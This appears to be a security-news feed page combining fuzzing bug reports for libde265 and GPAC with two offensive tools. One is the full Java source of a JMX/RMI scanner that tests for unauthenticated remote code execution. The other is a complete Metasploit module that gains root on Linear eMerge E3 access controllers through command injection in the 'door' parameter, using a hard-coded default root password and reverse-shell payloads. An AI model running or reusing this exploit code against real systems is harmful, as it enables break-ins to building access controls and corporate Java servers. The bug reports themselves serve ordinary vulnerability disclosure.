    SUMMARY: AddressSanitizer: stack-buffer-overflow (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x17d304) in void put_qpel_fallback<unsigned short>(short*, long, unsigned short const*, long, int, int, short*, int, int, int)
    Shadow bytes around the buggy address:
      0x10007d49da10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49da20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49da30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49da40: 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 f2 f2
      0x10007d49da50: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
    =>0x10007d49da60: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2[f2]00 00 00 00
      0x10007d49da70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49da80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49da90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49daa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007d49dab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==3829==ABORTING
    

**POC**

poc.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47655: Another stack-buffer-overflow in function void put_qpel_fallback<unsigned short> · Issue #367 · strukturag/libde265

SimpleRmiDiscoverer is a JMX RMI scanning tool for unsecured (without enabled authentication) instances of JAVA JMX. It does not use standard Java RMI/JMX classes like other available tools but rather communicates directly over TCP. The tool is written in Java and is very useful in red teaming operations because JVM is still ubiquitous in corporate environments. It can be executed by unprivileged (non-admin) users.

    // Simple JMX scanner extracting data (IP:Port) from RMI Registry and verifying RCE (using MLet) exploitability without credentials.// Version: 0.1// Sample use of: https://rabobank.jobs/en/techblog/security-risk-infrastructure/jmx-the-best-buddy-of-every-red-teamer-marcin-wolak/// Author: Marcin Wolak// LinkedIn: https://www.linkedin.com/in/marcinwolak/// Medium: https://marcin-wolak.medium.com/// Github: https://github.com/marcin-wolak/// Tested successfuly against JMX enabled on Java x64:// Java(TM) SE Runtime Environment (build 1.7.0_80-b15) on Windows 10// Java(TM) SE Runtime Environment (build 1.8.0_202-b08) on Windows 10// Java(TM) SE Runtime Environment (build 9.0.4+11) on Windows 10// OpenJDK Runtime Environment (build 11.0.17+8-post-Ubuntu-1ubuntu222.04)// OpenJDK Runtime Environment (build 17.0.5+8-Debian-2)import java.net.*;import java.io.InputStream;import java.io.OutputStream;import java.lang.System;import java.util.*;import java.io.DataInputStream;import java.io.ByteArrayInputStream;import org.apache.commons.cli.CommandLine;import org.apache.commons.cli.Option;import org.apache.commons.cli.Options;import org.apache.commons.cli.OptionBuilder;import org.apache.commons.cli.CommandLineParser;import org.apache.commons.cli.DefaultParser;import org.apache.commons.cli.ParseException;import org.apache.commons.cli.HelpFormatter;public class SimpleRmiDiscoverer {// IP Address of the RMI Registry to query (CMD Parameter)private String regIP;// TCP Port of the RMI Registry to query (CMD Parameter)private int regPort;// Ignore endpoint from RMI Registry to verify exploitability without credentials. Use instead IP of the registry itself and dynamic TCP port from the registry dump (CMD Parameter)private boolean ignoreEndpoint;// Extract Host:Port from the RMI Registry without checking RCE exploitability without credentials (CMD Parameter)private boolean dumpOnly;// IP Address and TCP port for the endpoint exposed via RMI Registryprivate String endPIP;private int endPPort;// Sockets for communication with RMI Registry and exposed endpointprivate Socket regS;private Socket endPS;//Streams for communication via above socketsprivate InputStream in, inEndP;private OutputStream out, outEndP;// RMI Handshake dataprivate byte[] hShake1 ={0x4A,0x52,0x4D,0x49,0x00,0x02,0x4B};private byte[] hShake2 ={0x00,0x09,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x00,0x00,0x00,0x00};// Calling Objprivate byte[] hObj ={0x50,(byte)0xac,(byte)0xed,0x00,0x05,0x77,0x22,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x44,0x15,0x4d,(byte)0xc9,(byte)0xd4,(byte)0xe6,0x3b,(byte)0xdf,0x74,0x00,0x06,0x6a,0x6d,0x78,0x72,0x6d,0x69};//Pattern to find in dumped registry (UnicastRef)private byte[] ucRef = {0x55,0x6e,0x69,0x63,0x61,0x73,0x74,0x52,0x65,0x66};//Pattern to find in exception dump (Credentials required)private byte[] credReq = {(byte)0x43,(byte)0x72,(byte)0x65,(byte)0x64,(byte)0x65,(byte)0x6e,(byte)0x74,(byte)0x69,(byte)0x61,(byte)0x6c,(byte)0x73,(byte)0x20,(byte)0x72,(byte)0x65,(byte)0x71,(byte)0x75,(byte)0x69,(byte)0x72,(byte)0x65,(byte)0x64};// Calling Obj (after modification) on the dynamic port  private byte[] hDObj ={(byte)0x50,(byte)0xac,(byte)0xed,(byte)0x00,(byte)0x05,(byte)0x77,(byte)0x22,(byte)0x6d,(byte)0xf9,(byte)0xa5,(byte)0x39,(byte)0xb4,(byte)0xfa,(byte)0x06,(byte)0xc3,(byte)0xea,(byte)0x8e,(byte)0xa7,(byte)0x0e,(byte)0x00,(byte)0x00,(byte)0x01,(byte)0x85,(byte)0x06,(byte)0x13,(byte)0xa1,(byte)0x4d,(byte)0x80,(byte)0x01,(byte)0xff,(byte)0xff,(byte)0xff,(byte)0xff,(byte)0xf0,(byte)0xe0,(byte)0x74,(byte)0xea,(byte)0xad,(byte)0x0c,(byte)0xae,(byte)0xa8,(byte)0x70};private String endpIP;private short enpPort;//javax.management.remote.rmi.RMIServerImpl_Stub object details collected from RMI registry:private byte[] rmiStub;int rmiStubLength;int eIPlength;byte [] eIP;byte [] ePort;// Constructor. Parameter dumps determines if only dynamic endpoint should be extracted from RMI Registry without checking if JMX is username/password protected// Ignore detrmines if the IP of endpoint extracted from registry should be ignored and the IP of RMI Registry used insteadpublic SimpleRmiDiscoverer(String rIP, int rPort, boolean ignore, boolean dump) {    regPort = rPort;    regIP = rIP;    rmiStub = new byte[4096];    ignoreEndpoint = ignore;                dumpOnly = dump;}// findArray taken from: https://stackoverflow.com/questions/3940194/find-an-array-inside-another-larger-array    public int findArray(byte[] largeArray, byte[] subArray) {        /* If any of the arrays is empty then not found */        if (largeArray.length == 0 || subArray.length == 0) {            return -1;        }        /* If subarray is larger than large array then not found */        if (subArray.length > largeArray.length) {            return -1;        }        for (int i = 0; i < largeArray.length; i++) {            /* Check if the next element of large array is the same as the first element of subarray */            if (largeArray[i] == subArray[0]) {                boolean subArrayFound = true;                for (int j = 0; j < subArray.length; j++) {                    /* If outside of large array or elements not equal then leave the loop */                    if (largeArray.length <= i+j || subArray[j] != largeArray[i+j]) {                        subArrayFound = false;                        break;                    }                }                /* Sub array found - return its index */                if (subArrayFound) {                    return i;                }            }        }        /* Return default value */        return -1;    }// Connecting to RMI Registry using IP/TCP pair from CLI private int connectRegistry(){  try {    //System.out.println("IP: " + regIP);    regS = new Socket(regIP, regPort);    in = this.regS.getInputStream();          out = this.regS.getOutputStream();  }  catch (Exception e) {    System.out.println("[!] Cannot connect to RMI Registry.");    //e.printStackTrace();    return 0;        }        return 1;}// RMI handshake. Common function for handshaking with RMI Registry as well as the endpoint extracted from it private int rmiHandShake(InputStream inP, OutputStream outP){  byte [] buffer = new byte[4096];  try {    outP.write(hShake1, 0, hShake1.length);    int count = inP.read(buffer);    if(count==0)    {      System.out.println("[!] Handshake failed, no date received. Likely not RMI.");      return -1;    }    else    {      if(buffer[0]!=0x4E)      {         System.out.println("[!] Handshake failed, bad response. Likely not RMI.");      return -2;      }      outP.write(hShake2, 0, hShake2.length);    }  }  catch (Exception e) {    System.out.println("[!] Handshake failed, Error in RMI Communication.");              //e.printStackTrace();              return 0;        }  return 1;}// Invoking RMIServerImpl_Stub over RMI Registryprivate int invokeObject(){  try {    out.write(hObj, 0, hObj.length);    int rmiStubLength = in.read(rmiStub);    if(rmiStubLength==0)    {      System.out.println("[-] RMIServerImpl_Stub invocation against RMI Registry failed, no response!");      return -1;    }    //String s = new String(rmiStub);    //System.out.println(s);    //Findinf "UnicastRef" in the response from RMI Registry:    int unipos = findArray(rmiStub, ucRef);    if(unipos<1)    {     System.out.println("[-] RMIServerImpl_Stub invocation against RMI Registry failed, Malformed registry dump.");     return -2;    }    //else    // System.out.println("\nThe position is: " + unipos);    eIPlength = (int) rmiStub[unipos+11];    //System.out.println("\nLength of eIP is: " + eIPlength);    eIP = Arrays.copyOfRange(rmiStub,unipos+12,unipos+12+eIPlength);    endPIP = new String(eIP);    //System.out.println("\nThe eIP is: " + endPIP);    ePort = Arrays.copyOfRange(rmiStub,unipos+12+eIPlength,unipos+16+eIPlength);    DataInputStream inputStream = new DataInputStream(new ByteArrayInputStream(ePort));    endPPort = inputStream.readInt();    //System.out.println(endPPort);    //System.out.println("\nThe ePort is: " + Integer.valueOf(new String(ePort)));  }  catch (Exception e) {    System.out.println("[-] RMIServerImpl_Stub invocation against RMI Registry failed, Other Error.");              // e.printStackTrace();              return 0;        }  return 1;}// Connecting to the endpoint extracted from RMI registry or (when ignore option active) to RMI Registry IP and TCP port extracted from this Registry.private int connectEndPoint(boolean ignoreEndPoint){  try {    //System.out.println("End Point IP: " + endPIP);    //System.out.println("End Point Port: " + endPPort);    System.out.println("[+] Connecting to the dynamic Endpoint ... ");    if(!ignoreEndPoint){      endPS = new Socket(endPIP, endPPort);    }    else    {      System.out.println("[+] Ignoring the endpoint exposed on: " + endPIP);      System.out.println("[+] Connecting instead to: " + regIP + " on TCP Port:" + Integer.toString(endPPort));      endPS = new Socket(regIP, endPPort);    }    inEndP = this.endPS.getInputStream();          outEndP = this.endPS.getOutputStream();  }  catch (Exception e) {            // e.printStackTrace();            System.out.println("[-] Connection to the dynamic Endpoint failed!");            return 0;        }        System.out.println("[+] Dynamic Endpoint connected successfuly!");        return 1;}// Invoking RMIServerImpl_Stub over the endpoint extracted from RMI registry or (when ignore option active) over RMI Registry IP and TCP port extracted from this Registry.private int invokeDObject(){  int unipos = findArray(rmiStub, ucRef);  System.arraycopy(rmiStub, unipos + 16 + endPIP.length(), hDObj, 7, 8);  System.arraycopy(rmiStub, 8, hDObj, 15, 4);  System.arraycopy(rmiStub, 16, hDObj, 23, 4);  byte [] buffer = new byte[4096];  try {    outEndP.write(hDObj, 0, hDObj.length);    int dStubLength = inEndP.read(buffer);    if(dStubLength==0)    {      System.out.println("[-] Invoking RMIServerImpl_Stub on the dynamic Endpoint failed, no response.");      return -1;    }    String s = new String(buffer);    if(s.contains("Credentials required")){      System.out.println("[-] Dynamic Enpoint requires credentials (username and password).");    }    else if(s.contains("UnicastRef")){      System.out.println("[+] Dynamic Enpoint is VULNERABLE to RCE, NO username and password required.");    }    else {      System.out.println("[-] Unknown outcome from invoking RMIServerImpl_Stub on the dynamic Endpoint. See below:");      System.out.println(s);    }  }  catch (Exception e) {    e.printStackTrace();              return 0;        }  return 1;}private void closeSocket(Socket inSock){        try{          inSock.close();}          catch (Exception e) {                //e.printStackTrace();              }}public static void main(String[] args) throws Exception{  boolean ignore=false;  boolean donly=false;  String IP = "";  long Port = 1099;  Options options = new Options();  options.addOption("h", "help", false, "Prints help for the tool.");  options.addOption("i", "ignore", false, "Uses RMI registry IP for methods invocations. Ignores endpoint from the Registry dump.");  options.addOption("d", "dumponly", false, "Extracting endpoint <host:port> from RMI Registry without checking exploitabilty, which is by default checked.");  options.addOption(OptionBuilder.withLongOpt("host").withDescription("IP of RMI Registry to query.").hasArg().withArgName("RMI HOST IP ").isRequired().create("H"));  options.addOption(OptionBuilder.withLongOpt("port").withDescription("TCP port of RMI Registry to query.").hasArg().withArgName("RMI HOST TCP PORT ").isRequired().create("P"));  //options.addOption("H", "--host", false, "IP of RMI Registry to query.");  //options.addOption("P", "--port", false, "TCP port of RMI Registry.");  CommandLineParser parser = new DefaultParser();    String header = "SimpleRmiDiscoverer extracts JMX host:port endpoint from RMI registry and checks if is exploitable without credentials using MLet.\n\n";        String footer = "\nPlease check my Blog for more details: https://marcin-wolak.medium.com/";   HelpFormatter formatter = new HelpFormatter();       try {        CommandLine cmd = parser.parse(options, args);        if (cmd.hasOption("h")) {        formatter.printHelp("SimpleRmiDiscoverer", header, options, footer, true);        System.exit(0);      }      if (cmd.hasOption("i")) {        ignore = true;      }      if (cmd.hasOption("d")) {        donly = true;      }      if (cmd.hasOption("H")) {        IP = cmd.getOptionValue("H");      }      if (cmd.hasOption("P")) {        try {          Port = Long.valueOf(cmd.getOptionValue("P")); }        catch (Exception e){          System.out.println(e.getMessage());          System.out.println("[!] Parameter -P --port must be a number between 1 and 65535!\n\n");          formatter.printHelp("SimpleRmiDiscoverer", header, options, footer, true);          System.exit(1);        }        if(Port<0 || Port>65535){          System.out.println("[!] Parameter -P --port out of range!\n\n");          formatter.printHelp("SimpleRmiDiscoverer", header, options, footer, true);          System.exit(0);        }              }          } catch (ParseException e){      System.out.println(e.getMessage());      formatter.printHelp("SimpleRmiDiscoverer", header, options, footer, true);      System.exit(1);      }  System.out.println("[+] Approached RMI Registry IP: " + IP);  System.out.println("[+] Approached RMI Registry TCP Port: " + Port);    SimpleRmiDiscoverer sRD = new SimpleRmiDiscoverer(IP, (int) Port, ignore, donly);  sRD.start();    }    public int start() {        // can now access non-static fields        int isConnected = connectRegistry();        if(isConnected == 0){          System.out.println("[-] Aborting Connection to RMI Registry! Quiting!");          closeSocket(regS);          return -1;        }        int isHShaked = rmiHandShake(in,out);        if(isHShaked != 1){          System.out.println("[-] Aborting handShaking with RMI Registry! Quiting!");          closeSocket(regS);          return -2;        }        int isInvoked = invokeObject();        if(isInvoked != 1){          System.out.println("[-] Object Calling Error, RMI Registry! Quiting");          closeSocket(regS);          return -2;        }                System.out.println("[+] RMI Registry contacted successfuly!");        System.out.println("[+] Extracted Endpoint Name / IP Address: " + endPIP);        System.out.println("[+] Extracted Endpoint Dynamic TCP Port: " + endPPort);                closeSocket(regS);                if(dumpOnly)        {          System.out.println("[+] RMI Registry Dump Completed Successfuly!");          System.exit(0);        }                int isEConnected = connectEndPoint(ignoreEndpoint);        if(isEConnected != 1){          System.out.println("[-] Aborting!");          closeSocket(endPS);          return -3;        }        isHShaked = rmiHandShake(inEndP, outEndP);        if(isHShaked != 1){          System.out.println("[-] Cannot handShake with the dynamic Endpoint!");          closeSocket(endPS);          return -2;        }        int isDInvoked = invokeDObject();        if(isDInvoked != 1){          System.out.println("[-] Cannot Invoke RMIServerImpl_Stub on the dynamic Endpoint!");          closeSocket(endPS);          return -4;        }        closeSocket(endPS);        return 1;    }    }

SimpleRmiDiscoverer 0.1

This Metasploit module exploits a command injection vulnerability in the Linear eMerge E3-Series Access Controller. The Linear eMerge E3 versions 1.00-06 and below are vulnerable to unauthenticated command injection in card_scan_decoder.php via the No and door HTTP GET parameter. Successful exploitation results in command execution as the root user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/stopwatch'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Linear eMerge E3-Series Access Controller Command Injection',        'Description' => %q{          This module exploits a command injection vulnerability in the Linear eMerge          E3-Series Access Controller. The Linear eMerge E3 versions `1.00-06` and below are vulnerable          to unauthenticated command injection in card_scan_decoder.php via the  `No` and `door` HTTP GET parameter.          Successful exploitation results in command execution as the `root` user.        },        'License' => MSF_LICENSE,        'Author' => [          'Gjoko Krstic <gjoko[at]applied-risk.com>', # Discovery          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor        ],        'References' => [          [ 'CVE', '2019-7256'],          [ 'URL', 'https://applied-risk.com/resources/ar-2019-005' ],          [ 'URL', 'https://na.niceforyou.com/' ],          [ 'URL', 'https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256' ],          [ 'EDB', '47649'],          [ 'PACKETSTORM', '155256']        ],        'DisclosureDate' => '2019-10-29',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_ARMLE],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_ARMLE],              'Type' => :linux_dropper,              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],              'DefaultOptions' => {                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 80,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options(      [        OptString.new('ROOT_PASSWORD', [ true, 'default root password on a vulnerable Linear eMerge E3-Series access controller', 'davestyle']),      ]    )  end  def execute_command(cmd, _opts = {})    random_no = rand(30..100)    return send_request_cgi({      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'card_scan_decoder.php'),      'vars_get' =>        {          'No' => random_no,          'door' => "`echo #{datastore['ROOT_PASSWORD']}|su -c \"#{cmd}\"`"        }    })  rescue StandardError => e    elog("#{peer} - Communication error occurred: #{e.message}", error: e)    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")  end  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution  def check    print_status("Checking if #{peer} can be exploited.")    sleep_time = rand(2..10)    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")    res, elapsed_time = Rex::Stopwatch.elapsed_time do      execute_command("sleep #{sleep_time}")    end    return CheckCode::Unknown('No response received from the target!') unless res    return CheckCode::Safe('Target is not affected by this vulnerability.') unless res.code == 200 && !res.body.blank? && res.body =~ /"card_format_default":"/    print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")    return CheckCode::Safe('Command injection test failed.') unless elapsed_time >= sleep_time    CheckCode::Vulnerable('Successfully tested command injection.')  end  def exploit    case target['Type']    when :unix_cmd      print_status("Executing #{target.name} with #{payload.encoded}")      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_command(payload.encoded)    when :linux_dropper      print_status("Executing #{target.name}")      execute_cmdstager(linemax: 262144)    end  endend

Linear eMerge E3-Series Access Controller Command Injection

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer overflow in hevc_parse_vps_extension function of media_tools/av_parsers.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

Buffer overflow in hevc\_parse\_vps\_extension function of media\_tools/av\_parsers.c

for (i = 0; i < (num\_scalability\_types - splitting\_flag); i++) {
  dimension\_id\_len\[i\] = 1 + gf\_bs\_read\_int\_log\_idx(bs, 3, "dimension\_id\_len\_minus1", i); // overflow at dimension\_id\_len
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof6.mp4
    

Crash reported by sanitizer

    [Core] exp-golomb read failed, not enough bits in bitstream !
    [HEVC] Warning: Error parsing NAL unit
    media_tools/av_parsers.c:7633:19: runtime error: index 16 out of bounds for type 'u8 [16]'
    

**POC**

poc\_bof6.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47095: Buffer overflow in hevc_parse_vps_extension function of media_tools/av_parsers.c · Issue #2346 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer Overflow in gf_text_process_sub function of filters/load_text.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

Buffer overflow in gf\_text\_process\_sub function of filters/load\_text.c

while (szLine\[i+1+j\] && szLine\[i+1+j\]!='}') {
	szTime\[i\] = szLine\[i+1+j\]; // overflow at szTime
	i++;
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc_bof5.avi
    

Crash reported by sanitizer

    Track Importing Timed Text - Text track 400 x 60 font Serif (size 18) layer 0
    [TXTIn] Bad SUB file - expecting "{" got "{"
    [TXTIn] corrupted SUB frame (line 2) - ends (at 0 ms) before start of current frame (6 ms) - skipping
    filters/load_text.c:2569:10: runtime error: index 20 out of bounds for type 'char [20]'
    

**POC**

poc\_bof5.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47091: Buffer overflow in gf_text_process_sub function of filters/load_text.c · Issue #2343 · gpac/gpac

GPAC MP4box 2.1-DEV-rev574-g9d5bb184b is vulnerable to Buffer Overflow via gf_vvc_read_sps_bs_internal function of media_tools/av_parsers.c

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description**

buffer overflow in gf\_vvc\_read\_sps\_bs\_internal function of media\_tools/av\_parsers.c

for (i=0; i<sps\_rpl1\_same\_as\_rpl0; i++) {
  u32 j;
  sps->num\_ref\_pic\_lists\[i\] = gf\_bs\_read\_ue\_log\_idx(bs, "sps\_num\_ref\_pic\_lists", i);
  for (j=0; j<sps->num\_ref\_pic\_lists\[i\]; j++) {
	  s32 res = vvc\_parse\_ref\_pic\_list\_struct(bs, sps, i, j, &sps->rps\[i\]\[j\]); // when j == 64, overflow sps->rps
	  if (res<0) return res;
  }
}

**Version info**

    MP4Box - GPAC version 2.1-DEV-rev574-g9d5bb184b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D
    

**Reproduce**

compile and run

    ./configure --enable-sanitizer
    make
    ./MP4Box import -add poc.mp4
    

Crash reported by sanitizer

    [VVC] Warning: Error parsing NAL unit
    [Core] exp-golomb read failed, not enough bits in bitstream !
    media_tools/av_parsers.c:10710:71: runtime error: index 65 out of bounds for type 'VVC_RefPicList [64]'
    

**POC**

poc\_bof.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

xdchase

Tag

#rce